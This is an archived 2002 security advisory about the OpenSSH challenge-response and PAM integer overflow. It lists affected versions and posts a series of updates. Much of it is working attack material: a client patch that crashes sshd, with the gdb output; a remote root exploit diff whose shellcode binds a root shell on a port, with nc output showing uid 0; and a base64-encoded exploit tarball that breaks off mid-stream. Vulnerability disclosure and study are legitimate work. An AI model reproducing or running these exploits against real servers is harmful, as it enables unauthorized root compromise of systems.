Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: sb5482.htm

OpenSSH remote buffer overflow



18th Nov 2002 [SBWID-5482]
COMMAND

	OpenSSH remote buffer overflow

SYSTEMS AFFECTED

	 All versions prior to (and including) 0penSSH 3.3
	
	 OpenSSH before v3.0 are not vulnerable if SKEY and BSD_AUTH options are NOT
	 enabled
	
	 OpenSSH afther (including) v3.0 has BSD_AUTH enabled by default and are
	 therefore vulnerable
	
	 Update (06 January 2003) 
	 ======
	
	 All existing PAM enabled versions of OpenSSH (3.5p1, 3.4p1 and below) ??

PROBLEM

	Theo de Raadt [deraadt@cvs.openbsd.org] initialy posted a warning  about
	a vulnerability in openSSH.  ISS  [http://www.iss.net]  is  now  posting
	details thanks to Mark Dowd findings :
	
	 http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584
	
	
	A buffer overflow can be  triggered  while  the  user  responds  to  the
	challenge during SKEY/BSD_AUTH style authentification.
	
	
	 Update (27 June 2002)
	 ======
	
	To be more specific, Markus Friedl of OpenBSD adds :
	
	OpenSSH's sshd contain an input validation error that can result  in  an
	integer overflow and privilege escalation.
	
	All  versions  between  2.3.1   and   3.3   contain   a   bug   in   the
	PAMAuthenticationViaKbdInt code.
	
	All  versions  between  2.9.9   and   3.3   contain   a   bug   in   the
	ChallengeResponseAuthentication code.
	
	OpenSSH 3.4 and later are not affected.
	
	-- See the diff in solutions for details --
	
	
	 Update (28 June 2002)
	 ======
	
	Joe  Testa  of  Rapid7  security   [http://www.rapid7.com]   gives   the
	following DoS code to sshd :
	
	The following are  instructions  on  how  to  reproduce  a  segmentation
	violation in sshd (v3.2.3p1):
	
	    0.)  Compile with PAM and S/KEY support.
	
	    1.)  Apply the following patch to the ssh client:
	
	- --- sshconnect2.c.bak    Thu Jun 27 11:54:54 2002
	+++ sshconnect2.c    Thu Jun 27 11:56:27 2002
	@@ -866,6 +866,7 @@
	     xfree(lang);
	 
	     num_prompts = packet_get_int();
	+    num_prompts = 2;
	     /*
	      * Begin to build info response packet based on prompts requested.
	      * We commit to providing the correct number of responses, so if
	@@ -877,15 +878,16 @@
	 
	     debug2("input_userauth_info_req: num_prompts %d", num_prompts);
	     for (i = 0; i < num_prompts; i++) {
	+      if ( i == 0 ) {
	         prompt = packet_get_string(NULL);
	         echo = packet_get_char();
	 
	         response = read_passphrase(prompt, echo ? RP_ECHO : 0);
	- -
	+      }
	         packet_put_cstring(response);
	- -        memset(response, 0, strlen(response));
	+        /*memset(response, 0, strlen(response));
	         xfree(response);
	- -        xfree(prompt);
	+        xfree(prompt);*/
	     }
	     packet_check_eom(); /* done with parsing incoming message. */
	
	
	    2.)  Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.
	
	    3.)  Connect to sshd using the modified client.
	         Note:  valid credentials are not required.
	
	On the server side, you'll see:
	
	[root@wonderland hi_chad]# gdb /usr/sbin/sshd
	GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
	Copyright 2001 Free Software Foundation, Inc.
	GDB is free software, covered by the GNU General Public License, and you are
	welcome to change it and/or distribute copies of it under certain 
	conditions.
	Type "show copying" to see the conditions.
	There is absolutely no warranty for GDB.  Type "show warranty" for details.
	This GDB was configured as "i386-redhat-linux"...
	(no debugging symbols found)...
	(gdb) run -d
	Starting program: /usr/sbin/sshd -d
	debug1: sshd version OpenSSH_3.2.3p1
	debug1: private host key: #0 type 0 RSA1
	debug1: read PEM private key done: type RSA
	debug1: private host key: #1 type 1 RSA
	debug1: read PEM private key done: type DSA
	debug1: private host key: #2 type 2 DSA
	socket: Address family not supported by protocol
	debug1: Bind to port 22 on 0.0.0.0.
	Server listening on 0.0.0.0 port 22.
	Generating 768 bit RSA key.
	RSA key generation complete.
	debug1: Server will not fork when running in debugging mode.
	Connection from 127.0.0.1 port 33208
	debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
	debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
	Enabling compatibility mode for protocol 2.0
	debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
	debug1: list_hostkey_types: ssh-rsa,ssh-dss
	debug1: SSH2_MSG_KEXINIT sent
	debug1: SSH2_MSG_KEXINIT received
	debug1: kex: client->server aes128-cbc hmac-md5 none
	debug1: kex: server->client aes128-cbc hmac-md5 none
	debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
	debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
	debug1: dh_gen_key: priv key bits set: 124/256
	debug1: bits set: 1626/3191
	debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
	debug1: bits set: 1597/3191
	debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
	debug1: kex_derive_keys
	debug1: newkeys: mode 1
	debug1: SSH2_MSG_NEWKEYS sent
	debug1: waiting for SSH2_MSG_NEWKEYS
	debug1: newkeys: mode 0
	debug1: SSH2_MSG_NEWKEYS received
	debug1: KEX done
	debug1: userauth-request for user jdog service ssh-connection method none
	debug1: attempt 0 failures 0
	debug1: Starting up PAM with username "jdog"
	debug1: PAM setting rhost to "localhost.localdomain"
	Failed none for jdog from 127.0.0.1 port 33208 ssh2
	debug1: userauth-request for user jdog service ssh-connection method 
	keyboard-interactive
	debug1: attempt 1 failures 1
	debug1: keyboard-interactive devs
	debug1: auth2_challenge: user=jdog devs=
	debug1: kbdint_alloc: devices 'skey'
	debug1: auth2_challenge_start: trying authentication method 'skey'
	debug1: got 2 responses
	(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x08053822 in strcpy ()
	(gdb)
	
	
	 Update (01 July 2002)
	 ======
	
	Christophe Devine kindly sent us a  remote  exploit  for  OpenBSD  &
	OpenSSH 3.2 :
	
	
	1. Download openssh-3.2.2p1.tar.gz and untar it
	
	~ $ tar -xvzf openssh-3.2.2p1.tar.gz
	
	2. Apply the patch provided below by running:
	
	~/openssh-3.2.2p1 $ patch < path_to_diff_file
	
	3. Compile the patched client
	
	~/openssh-3.2.2p1 $ ./configure && make ssh
	
	4. Run the evil ssh:
	
	~/openssh-3.2.2p1 $ ./ssh root:skey@localhost
	
	5. If the sploit worked, you can connect to port 128 in another terminal:
	
	~ $ nc localhost 128
	uname -a
	OpenBSD nice 3.1 GENERIC#59 i386
	id
	uid=0(root) gid=0(wheel) groups=0(wheel)
	
	--- sshconnect2.c	Sun Mar 31 20:49:39 2002
	+++ evil-sshconnect2.c	Fri Jun 28 19:22:12 2002
	@@ -839,6 +839,56 @@
	 /*
	  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE
	  */
	+
	+int do_syscall( int nb_args, int syscall_num, ... );
	+
	+void shellcode( void )
	+{
	+    int server_sock, client_sock, len;
	+    struct sockaddr_in server_addr;
	+    char rootshell[12], *argv[2], *envp[1];
	+
	+    server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
	+    server_addr.sin_addr.s_addr = 0;
	+    server_addr.sin_port = 32768;
	+    server_addr.sin_family = AF_INET;
	+    do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr, 16 );
	+    do_syscall( 2, 106, server_sock, 1 );
	+    client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
	+	&server_addr, &len );
	+    do_syscall( 2, 90, client_sock, 0 );
	+    do_syscall( 2, 90, client_sock, 1 );
	+    do_syscall( 2, 90, client_sock, 2 );
	+    * (int *) ( rootshell + 0 ) = 0x6E69622F;
	+    * (int *) ( rootshell + 4 ) = 0x0068732f;
	+    * (int *) ( rootshell + 8 ) = 0;
	+    argv[0] = rootshell;
	+    argv[1] = 0;
	+    envp[0] = 0;
	+    do_syscall( 3, 59, rootshell, argv, envp );
	+}
	+
	+int do_syscall( int nb_args, int syscall_num, ... )
	+{
	+    int ret;
	+    asm(
	+	"mov	8(%ebp), %eax; "
	+	"add	$3,%eax; "
	+	"shl	$2,%eax; "
	+	"add	%ebp,%eax; "
	+	"mov	8(%ebp), %ecx; "
	+	"push_args: "
	+	"push	(%eax); "
	+	"sub	$4, %eax; "
	+	"loop	push_args; "
	+	"mov	12(%ebp), %eax; "
	+	"push	$0; "
	+	"int	$0x80; "
	+	"mov	%eax,-4(%ebp)"
	+    );
	+    return( ret );
	+}
	+
	 void
	 input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
	 {
	@@ -865,7 +915,7 @@
	 	xfree(inst);
	 	xfree(lang);
	 
	-	num_prompts = packet_get_int();
	+	num_prompts = 1073741824 + 1024;
	 	/*
	 	 * Begin to build info response packet based on prompts requested.
	 	 * We commit to providing the correct number of responses, so if
	@@ -874,6 +924,13 @@
	 	 */
	 	packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
	 	packet_put_int(num_prompts);
	+
	+	for( i = 0; i < 1045; i++ )
	+	    packet_put_cstring( "xxxxxxxxxx" );
	+
	+	packet_put_string( shellcode, 2047 );
	+	packet_send();
	+	return;
	 
	 	debug2("input_userauth_info_req: num_prompts %d", num_prompts);
	 	for (i = 0; i < num_prompts; i++) {
	
	
	 Update (02 July 2002)
	 ======
	
	GOBBLES [http://www.immunitysec.com/GOBBLES/] provides a remote  OpenSSH
	exploit for 2.9.9-3.3.
	
	Content-type: application/x-gzip; name="sshutup-theo.tar.gz"
	Content-Transfer-Encoding: base64
	Content-Disposition: attachment; filename="sshutup-theo.tar.gz"
	
	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
